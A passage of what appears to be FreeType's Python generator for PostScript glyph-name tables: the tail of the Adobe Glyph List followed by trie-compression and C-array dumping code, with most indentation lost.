rieultikeutkorean;316A
rieulyeorinhieuhkorean;316D
rightangle;221F
righttackbelowcmb;0319
righttriangle;22BF
rihiragana;308A
rikatakana;30EA
rikatakanahalfwidth;FF98
ring;02DA
ringbelowcmb;0325
ringcmb;030A
ringhalfleft;02BF
ringhalfleftarmenian;0559
ringhalfleftbelowcmb;031C
ringhalfleftcentered;02D3
ringhalfright;02BE
ringhalfrightbelowcmb;0339
ringhalfrightcentered;02D2
rinvertedbreve;0213
rittorusquare;3351
rlinebelow;1E5F
rlongleg;027C
rlonglegturned;027A
rmonospace;FF52
rohiragana;308D
rokatakana;30ED
rokatakanahalfwidth;FF9B
roruathai;0E23
rparen;24AD
rrabengali;09DC
rradeva;0931
rragurmukhi;0A5C
rreharabic;0691
rrehfinalarabic;FB8D
rrvocalicbengali;09E0
rrvocalicdeva;0960
rrvocalicgujarati;0AE0
rrvocalicvowelsignbengali;09C4
rrvocalicvowelsigndeva;0944
rrvocalicvowelsigngujarati;0AC4
rsuperior;F6F1
rtblock;2590
rturned;0279
rturnedsuperior;02B4
ruhiragana;308B
rukatakana;30EB
rukatakanahalfwidth;FF99
rupeemarkbengali;09F2
rupeesignbengali;09F3
rupiah;F6DD
ruthai;0E24
rvocalicbengali;098B
rvocalicdeva;090B
rvocalicgujarati;0A8B
rvocalicvowelsignbengali;09C3
rvocalicvowelsigndeva;0943
rvocalicvowelsigngujarati;0AC3
s;0073
sabengali;09B8
sacute;015B
sacutedotaccent;1E65
sadarabic;0635
sadeva;0938
sadfinalarabic;FEBA
sadinitialarabic;FEBB
sadmedialarabic;FEBC
sagujarati;0AB8
sagurmukhi;0A38
sahiragana;3055
sakatakana;30B5
sakatakanahalfwidth;FF7B
sallallahoualayhewasallamarabic;FDFA
samekh;05E1
samekhdagesh;FB41
samekhdageshhebrew;FB41
samekhhebrew;05E1
saraaathai;0E32
saraaethai;0E41
saraaimaimalaithai;0E44
saraaimaimuanthai;0E43
saraamthai;0E33
saraathai;0E30
saraethai;0E40
saraiileftthai;F886
saraiithai;0E35
saraileftthai;F885
saraithai;0E34
saraothai;0E42
saraueeleftthai;F888
saraueethai;0E37
saraueleftthai;F887
sarauethai;0E36
sarauthai;0E38
sarauuthai;0E39
sbopomofo;3119
scaron;0161
scarondotaccent;1E67
scedilla;015F
schwa;0259
schwacyrillic;04D9
schwadieresiscyrillic;04DB
schwahook;025A
scircle;24E2
scircumflex;015D
scommaaccent;0219
sdotaccent;1E61
sdotbelow;1E63
sdotbelowdotaccent;1E69
seagullbelowcmb;033C
second;2033
secondtonechinese;02CA
section;00A7
seenarabic;0633
seenfinalarabic;FEB2
seeninitialarabic;FEB3
seenmedialarabic;FEB4
segol;05B6
segol13;05B6
segol1f;05B6
segol2c;05B6
segolhebrew;05B6
segolnarrowhebrew;05B6
segolquarterhebrew;05B6
segoltahebrew;0592
segolwidehebrew;05B6
seharmenian;057D
sehiragana;305B
sekatakana;30BB
sekatakanahalfwidth;FF7E
semicolon;003B
semicolonarabic;061B
semicolonmonospace;FF1B
semicolonsmall;FE54
semivoicedmarkkana;309C
semivoicedmarkkanahalfwidth;FF9F
sentisquare;3322
sentosquare;3323
seven;0037
sevenarabic;0667
sevenbengali;09ED
sevencircle;2466
sevencircleinversesansserif;2790
sevendeva;096D
seveneighths;215E
sevengujarati;0AED
sevengurmukhi;0A6D
sevenhackarabic;0667
sevenhangzhou;3027
sevenideographicparen;3226
seveninferior;2087
sevenmonospace;FF17
sevenoldstyle;F737
sevenparen;247A
sevenperiod;248E
sevenpersian;06F7
sevenroman;2176
sevensuperior;2077
seventeencircle;2470
seventeenparen;2484
seventeenperiod;2498
seventhai;0E57
sfthyphen;00AD
shaarmenian;0577
shabengali;09B6
shacyrillic;0448
shaddaarabic;0651
shaddadammaarabic;FC61
shaddadammatanarabic;FC5E
shaddafathaarabic;FC60
shaddafathatanarabic;0651 064B
shaddakasraarabic;FC62
shaddakasratanarabic;FC5F
shade;2592
shadedark;2593
shadelight;2591
shademedium;2592
shadeva;0936
shagujarati;0AB6
shagurmukhi;0A36
shalshelethebrew;0593
shbopomofo;3115
shchacyrillic;0449
sheenarabic;0634
sheenfinalarabic;FEB6
sheeninitialarabic;FEB7
sheenmedialarabic;FEB8
sheicoptic;03E3
sheqel;20AA
sheqelhebrew;20AA
sheva;05B0
sheva115;05B0
sheva15;05B0
sheva22;05B0
sheva2e;05B0
shevahebrew;05B0
shevanarrowhebrew;05B0
shevaquarterhebrew;05B0
shevawidehebrew;05B0
shhacyrillic;04BB
shimacoptic;03ED
shin;05E9
shindagesh;FB49
shindageshhebrew;FB49
shindageshshindot;FB2C
shindageshshindothebrew;FB2C
shindageshsindot;FB2D
shindageshsindothebrew;FB2D
shindothebrew;05C1
shinhebrew;05E9
shinshindot;FB2A
shinshindothebrew;FB2A
shinsindot;FB2B
shinsindothebrew;FB2B
shook;0282
sigma;03C3
sigma1;03C2
sigmafinal;03C2
sigmalunatesymbolgreek;03F2
sihiragana;3057
sikatakana;30B7
sikatakanahalfwidth;FF7C
siluqhebrew;05BD
siluqlefthebrew;05BD
similar;223C
sindothebrew;05C2
siosacirclekorean;3274
siosaparenkorean;3214
sioscieuckorean;317E
sioscirclekorean;3266
sioskiyeokkorean;317A
sioskorean;3145
siosnieunkorean;317B
siosparenkorean;3206
siospieupkorean;317D
siostikeutkorean;317C
six;0036
sixarabic;0666
sixbengali;09EC
sixcircle;2465
sixcircleinversesansserif;278F
sixdeva;096C
sixgujarati;0AEC
sixgurmukhi;0A6C
sixhackarabic;0666
sixhangzhou;3026
sixideographicparen;3225
sixinferior;2086
sixmonospace;FF16
sixoldstyle;F736
sixparen;2479
sixperiod;248D
sixpersian;06F6
sixroman;2175
sixsuperior;2076
sixteencircle;246F
sixteencurrencydenominatorbengali;09F9
sixteenparen;2483
sixteenperiod;2497
sixthai;0E56
slash;002F
slashmonospace;FF0F
slong;017F
slongdotaccent;1E9B
smileface;263A
smonospace;FF53
sofpasuqhebrew;05C3
softhyphen;00AD
softsigncyrillic;044C
sohiragana;305D
sokatakana;30BD
sokatakanahalfwidth;FF7F
soliduslongoverlaycmb;0338
solidusshortoverlaycmb;0337
sorusithai;0E29
sosalathai;0E28
sosothai;0E0B
sosuathai;0E2A
space;0020
spacehackarabic;0020
spade;2660
spadesuitblack;2660
spadesuitwhite;2664
sparen;24AE
squarebelowcmb;033B
squarecc;33C4
squarecm;339D
squarediagonalcrosshatchfill;25A9
squarehorizontalfill;25A4
squarekg;338F
squarekm;339E
squarekmcapital;33CE
squareln;33D1
squarelog;33D2
squaremg;338E
squaremil;33D5
squaremm;339C
squaremsquared;33A1
squareorthogonalcrosshatchfill;25A6
squareupperlefttolowerrightfill;25A7
squareupperrighttolowerleftfill;25A8
squareverticalfill;25A5
squarewhitewithsmallblack;25A3
srsquare;33DB
ssabengali;09B7
ssadeva;0937
ssagujarati;0AB7
ssangcieuckorean;3149
ssanghieuhkorean;3185
ssangieungkorean;3180
ssangkiyeokkorean;3132
ssangnieunkorean;3165
ssangpieupkorean;3143
ssangsioskorean;3146
ssangtikeutkorean;3138
ssuperior;F6F2
sterling;00A3
sterlingmonospace;FFE1
strokelongoverlaycmb;0336
strokeshortoverlaycmb;0335
subset;2282
subsetnotequal;228A
subsetorequal;2286
succeeds;227B
suchthat;220B
suhiragana;3059
sukatakana;30B9
sukatakanahalfwidth;FF7D
sukunarabic;0652
summation;2211
sun;263C
superset;2283
supersetnotequal;228B
supersetorequal;2287
svsquare;33DC
syouwaerasquare;337C
t;0074
tabengali;09A4
tackdown;22A4
tackleft;22A3
tadeva;0924
tagujarati;0AA4
tagurmukhi;0A24
taharabic;0637
tahfinalarabic;FEC2
tahinitialarabic;FEC3
tahiragana;305F
tahmedialarabic;FEC4
taisyouerasquare;337D
takatakana;30BF
takatakanahalfwidth;FF80
tatweelarabic;0640
tau;03C4
tav;05EA
tavdages;FB4A
tavdagesh;FB4A
tavdageshhebrew;FB4A
tavhebrew;05EA
tbar;0167
tbopomofo;310A
tcaron;0165
tccurl;02A8
tcedilla;0163
tcheharabic;0686
tchehfinalarabic;FB7B
tchehinitialarabic;FB7C
tchehmedialarabic;FB7D
tchehmeeminitialarabic;FB7C FEE4
tcircle;24E3
tcircumflexbelow;1E71
tcommaaccent;0163
tdieresis;1E97
tdotaccent;1E6B
tdotbelow;1E6D
tecyrillic;0442
tedescendercyrillic;04AD
teharabic;062A
tehfinalarabic;FE96
tehhahinitialarabic;FCA2
tehhahisolatedarabic;FC0C
tehinitialarabic;FE97
tehiragana;3066
tehjeeminitialarabic;FCA1
tehjeemisolatedarabic;FC0B
tehmarbutaarabic;0629
tehmarbutafinalarabic;FE94
tehmedialarabic;FE98
tehmeeminitialarabic;FCA4
tehmeemisolatedarabic;FC0E
tehnoonfinalarabic;FC73
tekatakana;30C6
tekatakanahalfwidth;FF83
telephone;2121
telephoneblack;260E
telishagedolahebrew;05A0
telishaqetanahebrew;05A9
tencircle;2469
tenideographicparen;3229
tenparen;247D
tenperiod;2491
tenroman;2179
tesh;02A7
tet;05D8
tetdagesh;FB38
tetdageshhebrew;FB38
tethebrew;05D8
tetsecyrillic;04B5
tevirhebrew;059B
tevirlefthebrew;059B
thabengali;09A5
thadeva;0925
thagujarati;0AA5
thagurmukhi;0A25
thalarabic;0630
thalfinalarabic;FEAC
thanthakhatlowleftthai;F898
thanthakhatlowrightthai;F897
thanthakhatthai;0E4C
thanthakhatupperleftthai;F896
theharabic;062B
thehfinalarabic;FE9A
thehinitialarabic;FE9B
thehmedialarabic;FE9C
thereexists;2203
therefore;2234
theta;03B8
theta1;03D1
thetasymbolgreek;03D1
thieuthacirclekorean;3279
thieuthaparenkorean;3219
thieuthcirclekorean;326B
thieuthkorean;314C
thieuthparenkorean;320B
thirteencircle;246C
thirteenparen;2480
thirteenperiod;2494
thonangmonthothai;0E11
thook;01AD
thophuthaothai;0E12
thorn;00FE
thothahanthai;0E17
thothanthai;0E10
thothongthai;0E18
thothungthai;0E16
thousandcyrillic;0482
thousandsseparatorarabic;066C
thousandsseparatorpersian;066C
three;0033
threearabic;0663
threebengali;09E9
threecircle;2462
threecircleinversesansserif;278C
threedeva;0969
threeeighths;215C
threegujarati;0AE9
threegurmukhi;0A69
threehackarabic;0663
threehangzhou;3023
threeideographicparen;3222
threeinferior;2083
threemonospace;FF13
threenumeratorbengali;09F6
threeoldstyle;F733
threeparen;2476
threeperiod;248A
threepersian;06F3
threequarters;00BE
threequartersemdash;F6DE
threeroman;2172
threesuperior;00B3
threethai;0E53
thzsquare;3394
tihiragana;3061
tikatakana;30C1
tikatakanahalfwidth;FF81
tikeutacirclekorean;3270
tikeutaparenkorean;3210
tikeutcirclekorean;3262
tikeutkorean;3137
tikeutparenkorean;3202
tilde;02DC
tildebelowcmb;0330
tildecmb;0303
tildecomb;0303
tildedoublecmb;0360
tildeoperator;223C
tildeoverlaycmb;0334
tildeverticalcmb;033E
timescircle;2297
tipehahebrew;0596
tipehalefthebrew;0596
tippigurmukhi;0A70
titlocyrilliccmb;0483
tiwnarmenian;057F
tlinebelow;1E6F
tmonospace;FF54
toarmenian;0569
tohiragana;3068
tokatakana;30C8
tokatakanahalfwidth;FF84
tonebarextrahighmod;02E5
tonebarextralowmod;02E9
tonebarhighmod;02E6
tonebarlowmod;02E8
tonebarmidmod;02E7
tonefive;01BD
tonesix;0185
tonetwo;01A8
tonos;0384
tonsquare;3327
topatakthai;0E0F
tortoiseshellbracketleft;3014
tortoiseshellbracketleftsmall;FE5D
tortoiseshellbracketleftvertical;FE39
tortoiseshellbracketright;3015
tortoiseshellbracketrightsmall;FE5E
tortoiseshellbracketrightvertical;FE3A
totaothai;0E15
tpalatalhook;01AB
tparen;24AF
trademark;2122
trademarksans;F8EA
trademarkserif;F6DB
tretroflexhook;0288
triagdn;25BC
triaglf;25C4
triagrt;25BA
triagup;25B2
ts;02A6
tsadi;05E6
tsadidagesh;FB46
tsadidageshhebrew;FB46
tsadihebrew;05E6
tsecyrillic;0446
tsere;05B5
tsere12;05B5
tsere1e;05B5
tsere2b;05B5
tserehebrew;05B5
tserenarrowhebrew;05B5
tserequarterhebrew;05B5
tserewidehebrew;05B5
tshecyrillic;045B
tsuperior;F6F3
ttabengali;099F
ttadeva;091F
ttagujarati;0A9F
ttagurmukhi;0A1F
tteharabic;0679
ttehfinalarabic;FB67
ttehinitialarabic;FB68
ttehmedialarabic;FB69
tthabengali;09A0
tthadeva;0920
tthagujarati;0AA0
tthagurmukhi;0A20
tturned;0287
tuhiragana;3064
tukatakana;30C4
tukatakanahalfwidth;FF82
tusmallhiragana;3063
tusmallkatakana;30C3
tusmallkatakanahalfwidth;FF6F
twelvecircle;246B
twelveparen;247F
twelveperiod;2493
twelveroman;217B
twentycircle;2473
twentyhangzhou;5344
twentyparen;2487
twentyperiod;249B
two;0032
twoarabic;0662
twobengali;09E8
twocircle;2461
twocircleinversesansserif;278B
twodeva;0968
twodotenleader;2025
twodotleader;2025
twodotleadervertical;FE30
twogujarati;0AE8
twogurmukhi;0A68
twohackarabic;0662
twohangzhou;3022
twoideographicparen;3221
twoinferior;2082
twomonospace;FF12
twonumeratorbengali;09F5
twooldstyle;F732
twoparen;2475
twoperiod;2489
twopersian;06F2
tworoman;2171
twostroke;01BB
twosuperior;00B2
twothai;0E52
twothirds;2154
u;0075
uacute;00FA
ubar;0289
ubengali;0989
ubopomofo;3128
ubreve;016D
ucaron;01D4
ucircle;24E4
ucircumflex;00FB
ucircumflexbelow;1E77
ucyrillic;0443
udattadeva;0951
udblacute;0171
udblgrave;0215
udeva;0909
udieresis;00FC
udieresisacute;01D8
udieresisbelow;1E73
udieresiscaron;01DA
udieresiscyrillic;04F1
udieresisgrave;01DC
udieresismacron;01D6
udotbelow;1EE5
ugrave;00F9
ugujarati;0A89
ugurmukhi;0A09
uhiragana;3046
uhookabove;1EE7
uhorn;01B0
uhornacute;1EE9
uhorndotbelow;1EF1
uhorngrave;1EEB
uhornhookabove;1EED
uhorntilde;1EEF
uhungarumlaut;0171
uhungarumlautcyrillic;04F3
uinvertedbreve;0217
ukatakana;30A6
ukatakanahalfwidth;FF73
ukcyrillic;0479
ukorean;315C
umacron;016B
umacroncyrillic;04EF
umacrondieresis;1E7B
umatragurmukhi;0A41
umonospace;FF55
underscore;005F
underscoredbl;2017
underscoremonospace;FF3F
underscorevertical;FE33
underscorewavy;FE4F
union;222A
universal;2200
uogonek;0173
uparen;24B0
upblock;2580
upperdothebrew;05C4
upsilon;03C5
upsilondieresis;03CB
upsilondieresistonos;03B0
upsilonlatin;028A
upsilontonos;03CD
uptackbelowcmb;031D
uptackmod;02D4
uragurmukhi;0A73
uring;016F
ushortcyrillic;045E
usmallhiragana;3045
usmallkatakana;30A5
usmallkatakanahalfwidth;FF69
ustraightcyrillic;04AF
ustraightstrokecyrillic;04B1
utilde;0169
utildeacute;1E79
utildebelow;1E75
uubengali;098A
uudeva;090A
uugujarati;0A8A
uugurmukhi;0A0A
uumatragurmukhi;0A42
uuvowelsignbengali;09C2
uuvowelsigndeva;0942
uuvowelsigngujarati;0AC2
uvowelsignbengali;09C1
uvowelsigndeva;0941
uvowelsigngujarati;0AC1
v;0076
vadeva;0935
vagujarati;0AB5
vagurmukhi;0A35
vakatakana;30F7
vav;05D5
vavdagesh;FB35
vavdagesh65;FB35
vavdageshhebrew;FB35
vavhebrew;05D5
vavholam;FB4B
vavholamhebrew;FB4B
vavvavhebrew;05F0
vavyodhebrew;05F1
vcircle;24E5
vdotbelow;1E7F
vecyrillic;0432
veharabic;06A4
vehfinalarabic;FB6B
vehinitialarabic;FB6C
vehmedialarabic;FB6D
vekatakana;30F9
venus;2640
verticalbar;007C
verticallineabovecmb;030D
verticallinebelowcmb;0329
verticallinelowmod;02CC
verticallinemod;02C8
vewarmenian;057E
vhook;028B
vikatakana;30F8
viramabengali;09CD
viramadeva;094D
viramagujarati;0ACD
visargabengali;0983
visargadeva;0903
visargagujarati;0A83
vmonospace;FF56
voarmenian;0578
voicediterationhiragana;309E
voicediterationkatakana;30FE
voicedmarkkana;309B
voicedmarkkanahalfwidth;FF9E
vokatakana;30FA
vparen;24B1
vtilde;1E7D
vturned;028C
vuhiragana;3094
vukatakana;30F4
w;0077
wacute;1E83
waekorean;3159
wahiragana;308F
wakatakana;30EF
wakatakanahalfwidth;FF9C
wakorean;3158
wasmallhiragana;308E
wasmallkatakana;30EE
wattosquare;3357
wavedash;301C
wavyunderscorevertical;FE34
wawarabic;0648
wawfinalarabic;FEEE
wawhamzaabovearabic;0624
wawhamzaabovefinalarabic;FE86
wbsquare;33DD
wcircle;24E6
wcircumflex;0175
wdieresis;1E85
wdotaccent;1E87
wdotbelow;1E89
wehiragana;3091
weierstrass;2118
wekatakana;30F1
wekorean;315E
weokorean;315D
wgrave;1E81
whitebullet;25E6
whitecircle;25CB
whitecircleinverse;25D9
whitecornerbracketleft;300E
whitecornerbracketleftvertical;FE43
whitecornerbracketright;300F
whitecornerbracketrightvertical;FE44
whitediamond;25C7
whitediamondcontainingblacksmalldiamond;25C8
whitedownpointingsmalltriangle;25BF
whitedownpointingtriangle;25BD
whiteleftpointingsmalltriangle;25C3
whiteleftpointingtriangle;25C1
whitelenticularbracketleft;3016
whitelenticularbracketright;3017
whiterightpointingsmalltriangle;25B9
whiterightpointingtriangle;25B7
whitesmallsquare;25AB
whitesmilingface;263A
whitesquare;25A1
whitestar;2606
whitetelephone;260F
whitetortoiseshellbracketleft;3018
whitetortoiseshellbracketright;3019
whiteuppointingsmalltriangle;25B5
whiteuppointingtriangle;25B3
wihiragana;3090
wikatakana;30F0
wikorean;315F
wmonospace;FF57
wohiragana;3092
wokatakana;30F2
wokatakanahalfwidth;FF66
won;20A9
wonmonospace;FFE6
wowaenthai;0E27
wparen;24B2
wring;1E98
wsuperior;02B7
wturned;028D
wynn;01BF
x;0078
xabovecmb;033D
xbopomofo;3112
xcircle;24E7
xdieresis;1E8D
xdotaccent;1E8B
xeharmenian;056D
xi;03BE
xmonospace;FF58
xparen;24B3
xsuperior;02E3
y;0079
yaadosquare;334E
yabengali;09AF
yacute;00FD
yadeva;092F
yaekorean;3152
yagujarati;0AAF
yagurmukhi;0A2F
yahiragana;3084
yakatakana;30E4
yakatakanahalfwidth;FF94
yakorean;3151
yamakkanthai;0E4E
yasmallhiragana;3083
yasmallkatakana;30E3
yasmallkatakanahalfwidth;FF6C
yatcyrillic;0463
ycircle;24E8
ycircumflex;0177
ydieresis;00FF
ydotaccent;1E8F
ydotbelow;1EF5
yeharabic;064A
yehbarreearabic;06D2
yehbarreefinalarabic;FBAF
yehfinalarabic;FEF2
yehhamzaabovearabic;0626
yehhamzaabovefinalarabic;FE8A
yehhamzaaboveinitialarabic;FE8B
yehhamzaabovemedialarabic;FE8C
yehinitialarabic;FEF3
yehmedialarabic;FEF4
yehmeeminitialarabic;FCDD
yehmeemisolatedarabic;FC58
yehnoonfinalarabic;FC94
yehthreedotsbelowarabic;06D1
yekorean;3156
yen;00A5
yenmonospace;FFE5
yeokorean;3155
yeorinhieuhkorean;3186
yerahbenyomohebrew;05AA
yerahbenyomolefthebrew;05AA
yericyrillic;044B
yerudieresiscyrillic;04F9
yesieungkorean;3181
yesieungpansioskorean;3183
yesieungsioskorean;3182
yetivhebrew;059A
ygrave;1EF3
yhook;01B4
yhookabove;1EF7
yiarmenian;0575
yicyrillic;0457
yikorean;3162
yinyang;262F
yiwnarmenian;0582
ymonospace;FF59
yod;05D9
yoddagesh;FB39
yoddageshhebrew;FB39
yodhebrew;05D9
yodyodhebrew;05F2
yodyodpatahhebrew;FB1F
yohiragana;3088
yoikorean;3189
yokatakana;30E8
yokatakanahalfwidth;FF96
yokorean;315B
yosmallhiragana;3087
yosmallkatakana;30E7
yosmallkatakanahalfwidth;FF6E
yotgreek;03F3
yoyaekorean;3188
yoyakorean;3187
yoyakthai;0E22
yoyingthai;0E0D
yparen;24B4
ypogegrammeni;037A
ypogegrammenigreekcmb;0345
yr;01A6
yring;1E99
ysuperior;02B8
ytilde;1EF9
yturned;028E
yuhiragana;3086
yuikorean;318C
yukatakana;30E6
yukatakanahalfwidth;FF95
yukorean;3160
yusbigcyrillic;046B
yusbigiotifiedcyrillic;046D
yuslittlecyrillic;0467
yuslittleiotifiedcyrillic;0469
yusmallhiragana;3085
yusmallkatakana;30E5
yusmallkatakanahalfwidth;FF6D
yuyekorean;318B
yuyeokorean;318A
yyabengali;09DF
yyadeva;095F
z;007A
zaarmenian;0566
zacute;017A
zadeva;095B
zagurmukhi;0A5B
zaharabic;0638
zahfinalarabic;FEC6
zahinitialarabic;FEC7
zahiragana;3056
zahmedialarabic;FEC8
zainarabic;0632
zainfinalarabic;FEB0
zakatakana;30B6
zaqefgadolhebrew;0595
zaqefqatanhebrew;0594
zarqahebrew;0598
zayin;05D6
zayindagesh;FB36
zayindageshhebrew;FB36
zayinhebrew;05D6
zbopomofo;3117
zcaron;017E
zcircle;24E9
zcircumflex;1E91
zcurl;0291
zdot;017C
zdotaccent;017C
zdotbelow;1E93
zecyrillic;0437
zedescendercyrillic;0499
zedieresiscyrillic;04DF
zehiragana;305C
zekatakana;30BC
zero;0030
zeroarabic;0660
zerobengali;09E6
zerodeva;0966
zerogujarati;0AE6
zerogurmukhi;0A66
zerohackarabic;0660
zeroinferior;2080
zeromonospace;FF10
zerooldstyle;F730
zeropersian;06F0
zerosuperior;2070
zerothai;0E50
zerowidthjoiner;FEFF
zerowidthnonjoiner;200C
zerowidthspace;200B
zeta;03B6
zhbopomofo;3113
zhearmenian;056A
zhebrevecyrillic;04C2
zhecyrillic;0436
zhedescendercyrillic;0497
zhedieresiscyrillic;04DD
zihiragana;3058
zikatakana;30B8
zinorhebrew;05AE
zlinebelow;1E95
zmonospace;FF5A
zohiragana;305E
zokatakana;30BE
zparen;24B5
zretroflexhook;0290
zstroke;01B6
zuhiragana;305A
zukatakana;30BA
"""
# string table management
#
class StringTable:
def __init__( self, name_list, master_table_name ):
self.names = name_list
self.master_table = master_table_name
self.indices = {}
index = 0
for name in name_list:
self.indices[name] = index
index += len( name ) + 1
self.total = index
def dump( self, file ):
write = file.write
write( " static const char " + self.master_table +
"[" + repr( self.total ) + "] =\n" )
write( " {\n" )
line = ""
for name in self.names:
line += " '"
      line += "','".join( name )
line += "', 0,\n"
write( line + " };\n\n\n" )
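  # For illustration (not emitted by this script), dumping the two names
  # ["A", "Ab"] into a master table named `foo' would produce a total size
  # of 5 (2 + 3 bytes, one NUL terminator after each name):
  #
  #   static const char  foo[5] =
  #   {
  #     'A', 0,
  #     'A','b', 0,
  #   };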
def dump_sublist( self, file, table_name, macro_name, sublist ):
write = file.write
write( "#define " + macro_name + " " + repr( len( sublist ) ) + "\n\n" )
write( " /* Values are offsets into the `" +
self.master_table + "' table */\n\n" )
write( " static const short " + table_name +
"[" + macro_name + "] =\n" )
write( " {\n" )
line = " "
comma = ""
col = 0
for name in sublist:
line += comma
line += "%4d" % self.indices[name]
col += 1
comma = ","
if col == 14:
col = 0
comma = ",\n "
write( line + "\n };\n\n\n" )
# We now store the Adobe Glyph List in compressed form. The list is put
# into a data structure called `trie' (because it has a tree-like
# appearance). Consider, for example, that you want to store the
# following name mapping:
#
# A => 1
# Aacute => 6
# Abalon => 2
# Abstract => 4
#
# It is possible to store the entries as follows.
#
# A => 1
# |
# +-acute => 6
# |
# +-b
# |
# +-alon => 2
# |
# +-stract => 4
#
# We see that each node in the trie has:
#
# - one or more `letters'
# - an optional value
# - zero or more child nodes
#
# The first step is to call
#
# root = StringNode( "", 0 )
#   for word in map.keys():
#     root.add( word, map[word] )
#
# which creates a large trie where each node has only one child.
#
# Executing
#
# root = root.optimize()
#
# optimizes the trie by merging the letters of successive nodes whenever
# possible.
#
# Each node of the trie is stored as follows.
#
# - First the node's letter, according to the following scheme. We
# use the fact that in the AGL no name contains character codes > 127.
#
# name bitsize description
# ----------------------------------------------------------------
# notlast 1 Set to 1 if this is not the last letter
# in the word.
# ascii 7 The letter's ASCII value.
#
# - The letter is followed by a children count and the value of the
# current key (if any). Again we can do some optimization because all
# AGL entries are from the BMP; this means that 16 bits are sufficient
#     to store their Unicode values. Additionally, no node has more than
# 127 children.
#
# name bitsize description
# -----------------------------------------
# hasvalue 1 Set to 1 if a 16-bit Unicode value follows.
# num_children 7 Number of children. Can be 0 only if
# `hasvalue' is set to 1.
# value 16 Optional Unicode value.
#
# - A node is finished by a list of 16bit absolute offsets to the
# children, which must be sorted in increasing order of their first
# letter.
#
# For simplicity, all 16bit quantities are stored in big-endian order.
#
# The root node has first letter = 0, and no value.
#
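# As a cross-check of the format above, here is a minimal decoding sketch
# (not used by this script; Python 2, like the rest of the file). `data'
# is the packed string produced by `StringNode.store' below, and `pos' is a
# node's absolute offset; the root decodes as a single NUL letter.
#
def debug_decode_node( data, pos ):
  letters = ""
  while 1:
    val = ord( data[pos] )
    pos += 1
    letters += chr( val & 127 )
    if not ( val & 128 ):          # high bit clear: last letter of the node
      break
  count = ord( data[pos] )         # `hasvalue' bit + 7-bit child count
  pos += 1
  value = None
  if count & 128:                  # a 16-bit big-endian Unicode value follows
    value = ( ord( data[pos] ) << 8 ) | ord( data[pos + 1] )
    pos += 2
  count = count & 127
  offsets = []
  for n in range( count ):         # absolute offsets of the children
    offsets.append( ( ord( data[pos] ) << 8 ) | ord( data[pos + 1] ) )
    pos += 2
  return letters, value, offsets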
class StringNode:
def __init__( self, letter, value ):
self.letter = letter
self.value = value
self.children = {}
def __cmp__( self, other ):
return ord( self.letter[0] ) - ord( other.letter[0] )
def add( self, word, value ):
if len( word ) == 0:
self.value = value
return
letter = word[0]
word = word[1:]
    if letter in self.children:
child = self.children[letter]
else:
child = StringNode( letter, 0 )
self.children[letter] = child
child.add( word, value )
def optimize( self ):
# optimize all children first
children = self.children.values()
self.children = {}
for child in children:
self.children[child.letter[0]] = child.optimize()
# don't optimize if there's a value,
# if we don't have any child or if we
# have more than one child
if ( self.value != 0 ) or ( not children ) or len( children ) > 1:
return self
child = children[0]
self.letter += child.letter
self.value = child.value
self.children = child.children
return self
def dump_debug( self, write, margin ):
# this is used during debugging
line = margin + "+-"
if len( self.letter ) == 0:
line += "<NOLETTER>"
else:
line += self.letter
if self.value:
line += " => " + repr( self.value )
write( line + "\n" )
if self.children:
margin += "| "
for child in self.children.values():
child.dump_debug( write, margin )
def locate( self, index ):
self.index = index
if len( self.letter ) > 0:
index += len( self.letter ) + 1
else:
index += 2
if self.value != 0:
index += 2
children = self.children.values()
children.sort()
index += 2 * len( children )
for child in children:
index = child.locate( index )
return index
def store( self, storage ):
# write the letters
l = len( self.letter )
if l == 0:
storage += struct.pack( "B", 0 )
else:
for n in range( l ):
val = ord( self.letter[n] )
if n < l - 1:
val += 128
storage += struct.pack( "B", val )
# write the count
children = self.children.values()
children.sort()
count = len( children )
if self.value != 0:
storage += struct.pack( "!BH", count + 128, self.value )
else:
storage += struct.pack( "B", count )
for child in children:
storage += struct.pack( "!H", child.index )
for child in children:
storage = child.store( storage )
return storage
def adobe_glyph_values():
"""return the list of glyph names and their unicode values"""
  lines = adobe_glyph_list.split( '\n' )
glyphs = []
values = []
for line in lines:
if line:
      fields = line.split( ';' )
      # print fields[1] + ' - ' + fields[0]
      subfields = fields[1].split( ' ' )
if len( subfields ) == 1:
glyphs.append( fields[0] )
values.append( fields[1] )
return glyphs, values
def filter_glyph_names( alist, filter ):
  """filter `alist' by taking _out_ all glyph names that are in `filter'"""
  extras = []
  for name in alist:
    if name not in filter:
      extras.append( name )
  return extras
def dump_encoding( file, encoding_name, encoding_list ):
"""dump a given encoding"""
write = file.write
write( " /* the following are indices into the SID name table */\n" )
write( " static const unsigned short " + encoding_name +
"[" + repr( len( encoding_list ) ) + "] =\n" )
write( " {\n" )
line = " "
comma = ""
col = 0
for value in encoding_list:
line += comma
line += "%3d" % value
comma = ","
col += 1
if col == 16:
col = 0
comma = ",\n "
write( line + "\n };\n\n\n" )
def dump_array( the_array, write, array_name ):
"""dumps a given encoding"""
write( " static const unsigned char " + array_name +
"[" + repr( len( the_array ) ) + "] =\n" )
write( " {\n" )
line = ""
comma = " "
col = 0
for value in the_array:
line += comma
line += "%3d" % ord( value )
comma = ","
col += 1
if col == 16:
col = 0
comma = ",\n "
if len( line ) > 1024:
write( line )
line = ""
write( line + "\n };\n\n\n" )
def main():
"""main program body"""
if len( sys.argv ) != 2:
    print( __doc__ % sys.argv[0] )
    sys.exit( 1 )
  file = open( sys.argv[1], "w" )
write = file.write
count_sid = len( sid_standard_names )
# `mac_extras' contains the list of glyph names in the Macintosh standard
# encoding which are not in the SID Standard Names.
#
mac_extras = filter_glyph_names( mac_standard_names, sid_standard_names )
# `base_list' contains the names of our final glyph names table.
# It consists of the `mac_extras' glyph names, followed by the SID
# standard names.
#
mac_extras_count = len( mac_extras )
base_list = mac_extras + sid_standard_names
write( "/***************************************************************************/\n" )
write( "/* */\n" )
write( "/* %-71s*/\n" % os.path.basename( sys.argv[1] ) )
write( "/* */\n" )
write( "/* PostScript glyph names. */\n" )
write( "/* */\n" )
write( "/* Copyright 2005 by */\n" )
write( "/* David Turner, Robert Wilhelm, and Werner Lemberg. */\n" )
write( "/* */\n" )
write( "/* This file is part of the FreeType project, and may only be used, */\n" )
write( "/* modified, and distributed under the terms of the FreeType project */\n" )
write( "/* license, LICENSE.TXT. By continuing to use, modify, or distribute */\n" )
write( "/* this file you indicate that you have read the license and */\n" )
write( "/* understand and accept it fully. */\n" )
write( "/* */\n" )
write( "/***************************************************************************/\n" )
write( "\n" )
write( "\n" )
write( " /* This file has been generated automatically -- do not edit! */\n" )
write( "\n" )
write( "\n" )
# dump final glyph list (mac extras + sid standard names)
#
